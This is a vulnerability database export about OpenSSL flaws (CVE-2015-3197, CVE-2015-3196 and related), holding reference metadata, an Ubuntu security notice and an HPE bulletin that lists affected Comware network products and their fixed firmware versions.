        "url": "https://cwe.mitre.org/data/definitions/310.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-3197"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/halon/changelog"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0445.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=webserver\u0026version=2.1.0"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05390893"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0304.html"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-3197"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0701"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0306.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0372.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/policies/secpolicy.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/policies/releasestrat.html),"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "BID",
        "id": "74491"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "PACKETSTORM",
        "id": "136213"
      },
      {
        "db": "PACKETSTORM",
        "id": "141101"
      },
      {
        "db": "PACKETSTORM",
        "id": "135596"
      },
      {
        "db": "PACKETSTORM",
        "id": "136032"
      },
      {
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "db": "PACKETSTORM",
        "id": "136034"
      },
      {
        "db": "PACKETSTORM",
        "id": "136132"
      },
      {
        "db": "PACKETSTORM",
        "id": "169661"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "db": "BID",
        "id": "82237"
      },
      {
        "db": "BID",
        "id": "74491"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "db": "PACKETSTORM",
        "id": "136213"
      },
      {
        "db": "PACKETSTORM",
        "id": "141101"
      },
      {
        "db": "PACKETSTORM",
        "id": "135596"
      },
      {
        "db": "PACKETSTORM",
        "id": "136032"
      },
      {
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "db": "PACKETSTORM",
        "id": "136034"
      },
      {
        "db": "PACKETSTORM",
        "id": "136132"
      },
      {
        "db": "PACKETSTORM",
        "id": "169661"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-28T00:00:00",
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "date": "2016-02-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "date": "2016-01-28T00:00:00",
        "db": "BID",
        "id": "82237"
      },
      {
        "date": "2015-05-06T00:00:00",
        "db": "BID",
        "id": "74491"
      },
      {
        "date": "2016-03-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "date": "2016-03-14T23:44:31",
        "db": "PACKETSTORM",
        "id": "136213"
      },
      {
        "date": "2017-02-15T14:19:58",
        "db": "PACKETSTORM",
        "id": "141101"
      },
      {
        "date": "2016-02-04T21:45:07",
        "db": "PACKETSTORM",
        "id": "135596"
      },
      {
        "date": "2016-03-02T15:44:44",
        "db": "PACKETSTORM",
        "id": "136032"
      },
      {
        "date": "2016-01-29T23:23:00",
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "date": "2016-03-02T18:33:33",
        "db": "PACKETSTORM",
        "id": "136034"
      },
      {
        "date": "2016-03-09T15:25:36",
        "db": "PACKETSTORM",
        "id": "136132"
      },
      {
        "date": "2016-01-28T12:12:12",
        "db": "PACKETSTORM",
        "id": "169661"
      },
      {
        "date": "2016-01-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "date": "2016-02-15T02:59:01.980000",
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-29T00:00:00",
        "db": "CERT/CC",
        "id": "VU#257823"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3197"
      },
      {
        "date": "2017-12-19T22:01:00",
        "db": "BID",
        "id": "82237"
      },
      {
        "date": "2016-07-21T02:00:00",
        "db": "BID",
        "id": "74491"
      },
      {
        "date": "2016-11-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-006985"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      },
      {
        "date": "2023-11-07T02:25:31.933000",
        "db": "NVD",
        "id": "CVE-2015-3197"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "135515"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL re-uses unsafe prime numbers in Diffie-Hellman protocol",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#257823"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-026"
      }
    ],
    "trust": 0.6
  }
}

VAR-201512-0485

Vulnerability from variot - Updated: 2024-07-23 21:00

ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange message. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. ============================================================================ Ubuntu Security Notice USN-2830-1 December 07, 2015

openssl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 15.10
Ubuntu 15.04
Ubuntu 14.04 LTS
Ubuntu 12.04 LTS

Summary:

Several security issues were fixed in OpenSSL. This issue only applied to Ubuntu 15.10. This issue only applied to Ubuntu 15.10. (CVE-2015-3194)

Adam Langley discovered that OpenSSL incorrectly handled malformed X509_ATTRIBUTE structures. (CVE-2015-3195)

It was discovered that OpenSSL incorrectly handled PSK identity hints. This issue only applied to Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3196)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 15.10: libssl1.0.0 1.0.2d-0ubuntu1.2

Ubuntu 15.04: libssl1.0.0 1.0.1f-1ubuntu11.5

Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.16

Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.32

After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05398322 Version: 1

HPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-02-21 Last Updated: 2017-02-21

Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE Network products including Comware 5, Comware 7, IMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.

References:

CVE-2015-1794 - Remote Denial of Service (DoS)
CVE-2015-3193 - Remote disclosure of sensitive information
CVE-2015-3194 - Remote Denial of Service (DoS)
CVE-2015-3195 - Remote disclosure of sensitive information
CVE-2015-3196 - Remote Denial of Service (DoS)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
HPE Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2015-1794
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3193
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVE-2015-3194
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3195
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3196
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software updates to resolve the vulnerabilities in the Comware, IMC and VCX products running OpenSSL.

COMWARE 5 Products

A6600 (Comware 5) - Version: R3303P28
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
HSR6602 (Comware 5) - Version: R3303P28
- HP Network Products
- JC176A HP 6602 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 (Comware 5) - Version: R3303P28
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
MSR20 (Comware 5) - Version: R2516
- HP Network Products
- JD432A HP A-MSR20-21 Router
- JD662A HP MSR20-20 Router
- JD663A HP A-MSR20-21 Router
- JD663B HP MSR20-21 Router
- JD664A HP MSR20-40 Router
- JF228A HP MSR20-40 Router
- JF283A HP MSR20-20 Router
MSR20-1X (Comware 5) - Version: R2516
- HP Network Products
- JD431A HP MSR20-10 Router
- JD667A HP MSR20-15 IW Multi-Service Router
- JD668A HP MSR20-13 Multi-Service Router
- JD669A HP MSR20-13 W Multi-Service Router
- JD670A HP MSR20-15 A Multi-Service Router
- JD671A HP MSR20-15 AW Multi-Service Router
- JD672A HP MSR20-15 I Multi-Service Router
- JD673A HP MSR20-11 Multi-Service Router
- JD674A HP MSR20-12 Multi-Service Router
- JD675A HP MSR20-12 W Multi-Service Router
- JD676A HP MSR20-12 T1 Multi-Service Router
- JF236A HP MSR20-15-I Router
- JF237A HP MSR20-15-A Router
- JF238A HP MSR20-15-I-W Router
- JF239A HP MSR20-11 Router
- JF240A HP MSR20-13 Router
- JF241A HP MSR20-12 Router
- JF806A HP MSR20-12-T Router
- JF807A HP MSR20-12-W Router
- JF808A HP MSR20-13-W Router
- JF809A HP MSR20-15-A-W Router
- JF817A HP MSR20-15 Router
- JG209A HP MSR20-12-T-W Router (NA)
- JG210A HP MSR20-13-W Router (NA)
MSR 30 (Comware 5) - Version: R2516
- HP Network Products
- JD654A HP MSR30-60 POE Multi-Service Router
- JD657A HP MSR30-40 Multi-Service Router
- JD658A HP MSR30-60 Multi-Service Router
- JD660A HP MSR30-20 POE Multi-Service Router
- JD661A HP MSR30-40 POE Multi-Service Router
- JD666A HP MSR30-20 Multi-Service Router
- JF229A HP MSR30-40 Router
- JF230A HP MSR30-60 Router
- JF232A HP RTMSR3040-AC-OVSAS-H3
- JF235A HP MSR30-20 DC Router
- JF284A HP MSR30-20 Router
- JF287A HP MSR30-40 DC Router
- JF801A HP MSR30-60 DC Router
- JF802A HP MSR30-20 PoE Router
- JF803A HP MSR30-40 PoE Router
- JF804A HP MSR30-60 PoE Router
- JG728A HP MSR30-20 TAA-compliant DC Router
- JG729A HP MSR30-20 TAA-compliant Router
MSR 30-16 (Comware 5) - Version: R2516
- HP Network Products
- JD659A HP MSR30-16 POE Multi-Service Router
- JD665A HP MSR30-16 Multi-Service Router
- JF233A HP MSR30-16 Router
- JF234A HP MSR30-16 PoE Router
MSR 30-1X (Comware 5) - Version: R2516
- HP Network Products
- JF800A HP MSR30-11 Router
- JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr
- JG182A HP MSR30-11E Router
- JG183A HP MSR30-11F Router
- JG184A HP MSR30-10 DC Router
MSR 50 (Comware 5) - Version: R2516
- HP Network Products
- JD433A HP MSR50-40 Router
- JD653A HP MSR50 Processor Module
- JD655A HP MSR50-40 Multi-Service Router
- JD656A HP MSR50-60 Multi-Service Router
- JF231A HP MSR50-60 Router
- JF285A HP MSR50-40 DC Router
- JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply
MSR 50-G2 (Comware 5) - Version: R2516
- HP Network Products
- JD429A HP MSR50 G2 Processor Module
- JD429B HP MSR50 G2 Processor Module
MSR 9XX (Comware 5) - Version: R2516
- HP Network Products
- JF812A HP MSR900 Router
- JF813A HP MSR920 Router
- JF814A HP MSR900-W Router
- JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr
- JG207A HP MSR900-W Router (NA)
- JG208A HP MSR920-W Router (NA)
MSR 93X (Comware 5) - Version: R2516
- HP Network Products
- JG511A HP MSR930 Router
- JG511B HP MSR930 Router
- JG512A HP MSR930 Wireless Router
- JG513A HP MSR930 3G Router
- JG513B HP MSR930 3G Router
- JG514A HP MSR931 Router
- JG514B HP MSR931 Router
- JG515A HP MSR931 3G Router
- JG516A HP MSR933 Router
- JG517A HP MSR933 3G Router
- JG518A HP MSR935 Router
- JG518B HP MSR935 Router
- JG519A HP MSR935 Wireless Router
- JG520A HP MSR935 3G Router
- JG531A HP MSR931 Dual 3G Router
- JG531B HP MSR931 Dual 3G Router
- JG596A HP MSR930 4G LTE/3G CDMA Router
- JG597A HP MSR936 Wireless Router
- JG665A HP MSR930 4G LTE/3G WCDMA Global Router
- JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
- JH009A HP MSR931 Serial (TI) Router
- JH010A HP MSR933 G.SHDSL (TI) Router
- JH011A HP MSR935 ADSL2+ (TI) Router
- JH012A HP MSR930 Wireless 802.11n (NA) Router
- JH012B HP MSR930 Wireless 802.11n (NA) Router
- JH013A HP MSR935 Wireless 802.11n (NA) Router
MSR1000 (Comware 5) - Version: See Mitigation
- HP Network Products
- JG732A HP MSR1003-8 AC Router
12500 (Comware 5) - Version: R1829P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JC808A HP 12500 TAA Main Processing Unit
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
9500E (Comware 5) - Version: R1829P02
- HP Network Products
- JC124A HP A9508 Switch Chassis
- JC124B HP 9505 Switch Chassis
- JC125A HP A9512 Switch Chassis
- JC125B HP 9512 Switch Chassis
- JC474A HP A9508-V Switch Chassis
- JC474B HP 9508-V Switch Chassis
10500 (Comware 5) - Version: R1210P02
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC614A HP 10500 Main Processing Unit
- JC748A HP 10512 Switch Chassis
- JG375A HP 10500 TAA-compliant Main Processing Unit
- JG820A HP 10504 TAA-compliant Switch Chassis
- JG821A HP 10508 TAA-compliant Switch Chassis
- JG822A HP 10508-V TAA-compliant Switch Chassis
- JG823A HP 10512 TAA-compliant Switch Chassis
7500 (Comware 5) - Version: R6710P02
- HP Network Products
- JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo
- JC697A HP 7502 TAA-compliant Main Processing Unit
- JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports
- JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports
- JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit
- JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit
- JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD194A HP 7500 384Gbps Fabric Module
- JD194B HP 7500 384Gbps Fabric Module
- JD195A HP 7500 384Gbps Advanced Fabric Module
- JD196A HP 7502 Fabric Module
- JD220A HP 7500 768Gbps Fabric Module
- JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports
- JD238A HP 7510 Switch Chassis
- JD238B HP 7510 Switch Chassis
- JD239A HP 7506 Switch Chassis
- JD239B HP 7506 Switch Chassis
- JD240A HP 7503 Switch Chassis
- JD240B HP 7503 Switch Chassis
- JD241A HP 7506-V Switch Chassis
- JD241B HP 7506-V Switch Chassis
- JD242A HP 7502 Switch Chassis
- JD242B HP 7502 Switch Chassis
- JD243A HP 7503-S Switch Chassis with 1 Fabric Slot
- JD243B HP 7503-S Switch Chassis with 1 Fabric Slot
- JE164A HP E7902 Switch Chassis
- JE165A HP E7903 Switch Chassis
- JE166A HP E7903 1 Fabric Slot Switch Chassis
- JE167A HP E7906 Switch Chassis
- JE168A HP E7906 Vertical Switch Chassis
- JE169A HP E7910 Switch Chassis
6125G/XG Blade Switch - Version: R2112P05
- HP Network Products
- 737220-B21 HP 6125G Blade Switch with TAA
- 737226-B21 HP 6125G/XG Blade Switch with TAA
- 658250-B21 HP 6125G/XG Blade Switch Opt Kit
- 658247-B21 HP 6125G Blade Switch Opt Kit
5830 (Comware 5) - Version: R1118P13
- HP Network Products
- JC691A HP 5830AF-48G Switch with 1 Interface Slot
- JC694A HP 5830AF-96G Switch
- JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot
- JG374A HP 5830AF-96G TAA-compliant Switch
5800 (Comware 5) - Version: R1810P03
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
5500 HI (Comware 5) - Version: R5501P21
- HP Network Products
- JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots
- JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots
- JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots
- JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
5500 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JD373A HP 5500-24G DC EI Switch
- JD374A HP 5500-24G-SFP EI Switch
- JD375A HP 5500-48G EI Switch
- JD376A HP 5500-48G-PoE EI Switch
- JD377A HP 5500-24G EI Switch
- JD378A HP 5500-24G-PoE EI Switch
- JD379A HP 5500-24G-SFP DC EI Switch
- JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots
- JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots
- JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface
- JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots
- JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots
- JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
4800G (Comware 5) - Version: R2221P22
- HP Network Products
- JD007A HP 4800-24G Switch
- JD008A HP 4800-24G-PoE Switch
- JD009A HP 4800-24G-SFP Switch
- JD010A HP 4800-48G Switch
- JD011A HP 4800-48G-PoE Switch
5500SI (Comware 5) - Version: R2221P22
- HP Network Products
- JD369A HP 5500-24G SI Switch
- JD370A HP 5500-48G SI Switch
- JD371A HP 5500-24G-PoE SI Switch
- JD372A HP 5500-48G-PoE SI Switch
- JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots
- JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
4500G (Comware 5) - Version: R2221P22
- HP Network Products
- JF428A HP 4510-48G Switch
- JF847A HP 4510-24G Switch
5120 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JE066A HP 5120-24G EI Switch
- JE067A HP 5120-48G EI Switch
- JE068A HP 5120-24G EI Switch with 2 Interface Slots
- JE069A HP 5120-48G EI Switch with 2 Interface Slots
- JE070A HP 5120-24G-PoE EI 2-slot Switch
- JE071A HP 5120-48G-PoE EI 2-slot Switch
- JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots
- JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots
- JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots
- JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots
- JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots
- JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
4210G (Comware 5) - Version: R2221P22
- HP Network Products
- JF844A HP 4210-24G Switch
- JF845A HP 4210-48G Switch
- JF846A HP 4210-24G-PoE Switch
5120 SI (Comware 5) - Version: R1517
- HP Network Products
- JE072A HP 5120-48G SI Switch
- JE072B HPE 5120 48G SI Switch
- JE073A HP 5120-16G SI Switch
- JE073B HPE 5120 16G SI Switch
- JE074A HP 5120-24G SI Switch
- JE074B HPE 5120 24G SI Switch
- JG091A HP 5120-24G-PoE+ (370W) SI Switch
- JG091B HPE 5120 24G PoE+ (370W) SI Switch
- JG092A HP 5120-24G-PoE+ (170W) SI Switch
- JG309B HPE 5120 8G PoE+ (180W) SI Switch
- JG310B HPE 5120 8G PoE+ (65W) SI Switch
3610 (Comware 5) - Version: R5319P15
- HP Network Products
- JD335A HP 3610-48 Switch
- JD336A HP 3610-24-4G-SFP Switch
- JD337A HP 3610-24-2G-2G-SFP Switch
- JD338A HP 3610-24-SFP Switch
3600V2 (Comware 5) - Version: R2111P01
- HP Network Products
- JG299A HP 3600-24 v2 EI Switch
- JG299B HP 3600-24 v2 EI Switch
- JG300A HP 3600-48 v2 EI Switch
- JG300B HP 3600-48 v2 EI Switch
- JG301A HP 3600-24-PoE+ v2 EI Switch
- JG301B HP 3600-24-PoE+ v2 EI Switch
- JG301C HP 3600-24-PoE+ v2 EI Switch
- JG302A HP 3600-48-PoE+ v2 EI Switch
- JG302B HP 3600-48-PoE+ v2 EI Switch
- JG302C HP 3600-48-PoE+ v2 EI Switch
- JG303A HP 3600-24-SFP v2 EI Switch
- JG303B HP 3600-24-SFP v2 EI Switch
- JG304A HP 3600-24 v2 SI Switch
- JG304B HP 3600-24 v2 SI Switch
- JG305A HP 3600-48 v2 SI Switch
- JG305B HP 3600-48 v2 SI Switch
- JG306A HP 3600-24-PoE+ v2 SI Switch
- JG306B HP 3600-24-PoE+ v2 SI Switch
- JG306C HP 3600-24-PoE+ v2 SI Switch
- JG307A HP 3600-48-PoE+ v2 SI Switch
- JG307B HP 3600-48-PoE+ v2 SI Switch
- JG307C HP 3600-48-PoE+ v2 SI Switch
3100V2 (Comware 5) - Version: R5213P01
- HP Network Products
- JD313B HPE 3100 24 PoE v2 EI Switch
